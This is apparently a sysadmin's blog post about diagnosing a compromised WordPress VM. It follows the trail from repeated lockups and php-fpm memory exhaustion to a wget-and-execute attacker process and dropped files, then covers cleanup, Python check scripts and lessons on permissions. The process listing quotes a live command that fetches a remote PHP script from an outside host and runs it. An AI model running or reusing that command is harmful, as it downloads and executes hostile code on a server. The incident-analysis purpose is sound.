Background
I have a few spare VMs running in the cloud, waiting to be put to use. These VMs are provisioned using Ansible but are not in production use. One of them hosts a WordPress site on a basic LAMP stack. The only ports open to the world are SSH and HTTP/HTTPS. I should add that sshd is configured to use key authentication only, as any sane person would do.
This particular VM runs Debian 11 and has 1 GB of RAM. It serves the sample page that came with WordPress, with little to no configuration other than the WP 2FA and W3 Total Cache plug-ins.
How I found out
I occasionally visit the website URL to check that everything is working. Strangely enough, one day the website was unreachable. I tried to ssh into the VM and the connection timed out. As a last resort, I went to the cloud provider's dashboard and rebooted the VM. As a side note, I had uninstalled all the diagnostics agent software pre-installed by the cloud provider to keep the tiny VM lean; as a result, I could not monitor the VM from the dashboard.
After the VM came back from the reboot, the website showed up again and I could ssh in. Everything seemed to be functional. However, it wasn't long before the VM locked up again: when I checked in a few hours later, the same thing had happened all over again.
Investigation
After a few more reboots, I decided to investigate the root cause of this strange behaviour. I highly doubted that the website was too popular: it's just a blank site with almost zero traffic. The Apache configuration is kept at its defaults; the php-fpm configuration is tuned to be on the conservative side, with very few workers. I started a benchmark from another VM using ab from the apache2-utils package:
~$ ab -c30 -t30 'https://example.com/?cat=1'
This command opens 30 concurrent connections from the other VM and keeps requesting a dynamic page for up to 30 seconds to stress the PHP processing. As expected, the server handled the test just fine, without any significant RAM usage.
As I dug deeper into the process tree, it didn't take me long to find out that the memory was slowly being eaten by PHP processes. It happened gradually over the course of a few hours, until all memory was consumed by php-fpm and the OOM killer finally kicked in. A quick systemctl status -l php7.4-fpm.service gave the following info:
● php7.4-fpm.service - The PHP 7.4 FastCGI Process Manager
Loaded: loaded (/lib/systemd/system/php7.4-fpm.service; enabled; vendor preset: enabled)
Active: active (running) since Sun 2022-03-06 23:11:47 EST; 1h 13min ago
Docs: man:php-fpm7.4(8)
Process: 650 ExecStartPost=/usr/lib/php/php-fpm-socket-helper install /run/php/php-fpm.sock /etc/php/7.4/fpm/pool.d/www.conf 74 (code=exited, s>
Main PID: 482 (php-fpm7.4)
Status: "Processes active: 2, idle: 14, Requests: 166, slow: 0, Traffic: 0req/sec"
Tasks: 75 (limit: 1128)
Memory: 773.4M
CPU: 14min 29.690s
CGroup: /system.slice/php7.4-fpm.service
├─ 482 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
├─ 649 php-fpm: pool www
├─ 750 php-fpm: pool www
├─ 753 php-fpm: pool www
├─ 768 php-fpm: pool www
├─ 56725 php-fpm: pool www
├─ 56736 php-fpm: pool www
├─ 56737 php-fpm: pool www
├─ 92508 php-fpm: pool www
├─ 92528 php-fpm: pool www
├─ 92529 php-fpm: pool www
├─ 92587 php-fpm: pool www
├─ 98783 sh -c wget http://32868.port0.org/st/get_xleet.txt -O inc.class.xleet.php; php inc.class.xleet.php
├─ 98848 php inc.class.xleet.php
├─107565 sh -c php inc.class.xleet.ph
The last three processes immediately sent a chill down my spine. Why was it downloading and executing a PHP script? This was bad.
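Spotting those stray processes by eye worked here, but the same check is easy to automate. The snippet below is a minimal sketch, not something that ran on the VM: it takes the CGroup lines from the systemctl output as plain text and reports every process whose command line does not start with "php-fpm:". The function name find_unexpected and the EXPECTED_PREFIXES allow-list are made up for illustration.

```python
import re

# Assumption for this sketch: only php-fpm master/worker processes
# belong in the php7.4-fpm.service cgroup.
EXPECTED_PREFIXES = ("php-fpm:",)


def find_unexpected(cgroup_lines):
    """Return (pid, command) pairs for processes that are not php-fpm workers."""
    unexpected = []
    for line in cgroup_lines:
        # Skip the tree-drawing characters systemctl prints before each PID.
        match = re.match(r"^[\s├└─│]*(\d+)\s+(.*)$", line)
        if not match:
            continue  # header lines such as "Memory: 773.4M" carry no PID
        pid, command = int(match.group(1)), match.group(2).strip()
        if not command.startswith(EXPECTED_PREFIXES):
            unexpected.append((pid, command))
    return unexpected


if __name__ == "__main__":
    sample = [
        "├─ 482 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)",
        "├─ 649 php-fpm: pool www",
        "├─ 98848 php inc.class.xleet.php",
        "├─107565 sh -c php inc.class.xleet.ph",
    ]
    for pid, command in find_unexpected(sample):
        print(pid, command)
```

An allow-list like this is deliberately strict: anything php-fpm spawns through a shell gets flagged, which is exactly what gave the intrusion away in the output above.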
A quick ls -lA on the document root:
total 344
-rw-r--r-- 1 www-data www-data 8197 Mar 7 15:21 .htaccess
-rwxr-xr-x 1 www-data www-data 2067 Feb 21 20:19 3index.php
-rw-r--r-- 1 www-data www-data 362 Feb 16 11:25 accesson.php
-rw-r--r-- 1 www-data www-data 16090 Mar 7 16:18 angry.txt
drwxr-xr-x 3 www-data www-data 4096 Feb 22 09:36 assets
-rw-r--r-- 1 www-data www-data 1194 Mar 7 16:18 inc.class.xleet.php
-rwxr-xr-x 1 www-data www-data 405 Feb 22 19:35 index.php
-rwxr-xr-x 1 www-data www-data 19915 Mar 7 15:32 license.txt
-rw-r--r-- 1 www-data www-data 12484 Mar 7 16:18 list.txt
-rwxr-xr-x 1 www-data www-data 2012 Nov 10 09:31 old-index.php
-rw-r--r-- 1 www-data www-data 29 Feb 21 20:19 on.php
-rwxr-xr-x 1 www-data www-data 7437 Mar 7 15:32 readme.html
-rwxr-xr-x 1 www-data www-data 556 Oct 29 23:53 robots.txt
-rw-r--r-- 1 www-data www-data 10445 Mar 7 16:18 roll.txt
-rwxr-xr-x 1 www-data www-data 16290 Oct 29 23:51 store.php
-rw-r--r-- 1 www-data www-data 1219 Feb 22 19:35 unzip.php
-rwxr-xr-x 1 www-data www-data 2094 Nov 10 10:21 wikindex.php
drwxr-xr-x 8 www-data www-data 4096 Oct 29 16:10 wordpress
-rwxr-xr-x 1 www-data www-data 7165 Jan 20 2021 wp-activate.php
drwxr-xr-x 9 www-data www-data 4096 Dec 31 1969 wp-admin
-rwxr-xr-x 1 www-data www-data 7246 Nov 10 09:31 wp-admin.php
-rwxr-xr-x 1 www-data www-data 351 Feb 6 2020 wp-blog-header.php
-rwxr-xr-x 1 www-data www-data 2338 Feb 1 12:35 wp-comments-post.php
-rwxr-xr-x 1 www-data www-data 3001 Feb 1 12:35 wp-config-sample.php
-rwxr-xr-x 1 www-data www-data 3383 Sep 15 22:08 wp-config.php
drwxr-xr-x 10 www-data www-data 4096 Mar 7 15:33 wp-content
-rwxr-xr-x 1 www-data www-data 3939 Jul 30 2020 wp-cron.php
drwxr-xr-x 26 www-data www-data 12288 Feb 1 12:35 wp-includes
-rwxr-xr-x 1 www-data www-data 2496 Feb 6 2020 wp-links-opml.php
-rwxr-xr-x 1 www-data www-data 3900 May 15 2021 wp-load.php
-rwxr-xr-x 1 www-data www-data 47916 Feb 1 12:35 wp-login.php
-rwxr-xr-x 1 www-data www-data 8582 Feb 1 12:35 wp-mail.php
-rwxr-xr-x 1 www-data www-data 23025 Feb 1 12:35 wp-settings.php
-rwxr-xr-x 1 www-data www-data 31959 Feb 1 12:35 wp-signup.php
-rwxr-xr-x 1 www-data www-data 4747 Oct 8 2020 wp-trackback.php
-rwxr-xr-x 1 www-data www-data 3236 Jun 8 2020 xmlrpc.php
Clearly some unknown files had been created (like angry.txt), along with the BIG RED ALERT: inc.class.xleet.php. I tried to delete those files, but they kept popping back up. I also noticed the odd permissions in the document root: 755 on regular files seemed too open. However, there was no time to think! I quickly removed the document root entirely and went on to check the system logs for any bigger problem. Luckily, I didn't find any evidence that the compromise reached beyond the document root.
Back to WordPress: I downloaded a fresh installer, whose default permissions are conservative (644 for the most part). After I extracted it and started serving it, the PHP scripts didn't make a comeback.
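With a fresh copy of WordPress at hand, one way to spot dropped or altered files is to compare the live document root against the pristine extraction. The following is a rough sketch under that assumption; compare_trees and its two arguments are hypothetical names, and it only looks at file names and contents, not at permissions or ownership.

```python
import hashlib
from pathlib import Path


def file_digest(path):
    """Return the SHA-256 hex digest of a file's contents."""
    return hashlib.sha256(path.read_bytes()).hexdigest()


def compare_trees(docroot, pristine):
    """Compare a live document root with a pristine extraction.

    Returns two sorted lists of relative paths:
    files present only in docroot, and files whose contents differ.
    """
    docroot, pristine = Path(docroot), Path(pristine)
    live = {p.relative_to(docroot) for p in docroot.rglob("*") if p.is_file()}
    ref = {p.relative_to(pristine) for p in pristine.rglob("*") if p.is_file()}

    added = sorted(p.as_posix() for p in live - ref)
    modified = sorted(
        p.as_posix()
        for p in live & ref
        if file_digest(docroot / p) != file_digest(pristine / p)
    )
    return added, modified
```

Calling compare_trees with the document root and the directory holding the fresh extraction returns the two lists. Some differences are legitimate: wp-config.php, .htaccess and anything under wp-content (plug-ins, uploads, cache) will show up and need a manual look, so the output is a starting point for review rather than a verdict.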
Postmortem
I am not a security expert, but this was serious enough for me to reflect on and learn a lesson from. The most likely scenario is that the file permissions on the document root were too open. Either the www-data user or the php-fpm process was compromised as a result.
It was ultimately due to a misconfiguration in my Ansible playbook, which extracts the WordPress tarball and resets the permissions to 755. Thank goodness this was the only affected machine, as the other WordPress sites that I administer were set up by hand.
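The playbook itself is not shown here, so the following is only a sketch of the kind of check that could run after provisioning. It assumes the targets should be 644 for regular files and 755 for directories, in line with what the fresh installer uses for most files; normalize_permissions, FILE_MODE and DIR_MODE are illustrative names, and by default the function only reports and does not change anything.

```python
import os
import stat

# Assumed targets for this sketch: 644 for files, 755 for directories.
FILE_MODE = 0o644
DIR_MODE = 0o755


def normalize_permissions(root, apply=False):
    """Return paths under root whose mode differs from the target.

    When apply is True, the offending paths are also chmod-ed to the target.
    The root directory itself is not checked, only what is below it.
    """
    offenders = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue  # leave symlinks alone
            target = DIR_MODE if os.path.isdir(path) else FILE_MODE
            current = stat.S_IMODE(os.lstat(path).st_mode)
            if current != target:
                offenders.append(path)
                if apply:
                    os.chmod(path, target)
    return sorted(offenders)
```

Running it once with apply left at False gives a list to review before anything is changed. Note that permission bits are only part of the picture: in the listing above every file is also owned by www-data, so who owns the files deserves the same scrutiny as the mode.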
Lastly, I removed this VM entirely as a precaution.
Takeaways
There are three lessons I learned:
- When something strange happens, take it seriously and investigate; it's a sysadmin's responsibility
- Don't mess with default permissions without a good reason
- Examine automation code carefully before pushing; convenience can be a double-edged sword